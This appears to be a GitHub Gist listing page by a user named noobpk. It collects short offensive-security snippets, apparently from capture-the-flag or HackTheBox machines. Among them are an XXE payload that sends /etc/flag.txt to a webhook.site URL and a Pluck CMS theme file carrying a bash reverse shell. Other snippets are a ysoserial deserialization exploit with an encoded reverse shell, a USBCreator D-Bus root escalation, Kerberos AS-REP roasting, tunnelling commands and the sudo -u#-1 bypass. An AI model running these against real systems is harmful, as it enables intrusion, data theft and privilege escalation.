lethanhphuc noobpk
🤒
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///etc/flag.txt"> | |
| <!ENTITY % all "<!ENTITY send SYSTEM 'https://webhook.site/55c683be-520b-435f-ad7b-9f9b6053f7d7/?flag=%file;'>"> | |
| %all; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //This is the old default theme of pluck | |
| //Designer: Sander Thijsen, http://www.somp.nl | |
| //You can find pluck at http://www.pluck-cms.org | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'"); | |
| $themedir = "oldstyle_exec"; | |
| $themename = "Oldstyle_exec"; | |
| $module_space[0] = "main"; | |
| $module_space[1] = "footer"; | |
| ?> |
noobpk
/ install-burp-ca-android.sh
Created
December 29, 2020 07:53
Install Burpsuite CA for Android
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der | |
| openssl x509 -inform DER -in cacert.der -out cacert.pem | |
| export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1) | |
| adb root && adb remount | |
| adb push cacert.pem "/sdcard/${CERT_HASH}.0" | |
| adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts" | |
| adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0" | |
| rm -rf cacert.* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python3 GetNPUsers.py domain.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #bash -i >& /dev/tcp/10.10.14.169/4444 0>&1 | |
| payload="bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42OS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" | |
| java -jar ysoserial-master.jar CommonsCollections2 "${payload}" > noob.session | |
| curl -F '[email protected]' http://localhost/upload.jsp?email=noob@noob | |
| curl --cookie "JSESSIONID=../../../../../opt/samples/uploads/noob" -L http://localhost/upload.jsp?email=noob@noob |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #document: https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/ | |
| #detect | |
| remote-machine> ps auwx | grep usb | |
| remote-machine> echo "attack-machine id_rsa.pub key" > ~/authorized_keys | |
| remote-machine> gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/remote/authorized_keys /root/.ssh/authorized_keys true | |
| attack-machine> ssh -i id_rsa [email protected] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| bash -i >& /dev/tcp/10.10.14.4/4444 0>&1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://github.com/jpillora/chisel | |
| chisel client <ip-server>:<port-server> R:4506:127.0.0.1:4506 R:1234:127.0.0.1:1234 | |
| chisel server -p <port> --reverse |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #proxychains config: /etc/proxychains.conf | |
| ssh -D <port-proxychains> root@<ip-target> | |
| proxychains <application> <application-option> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo -u#-1 /bin/bash |
NewerOlder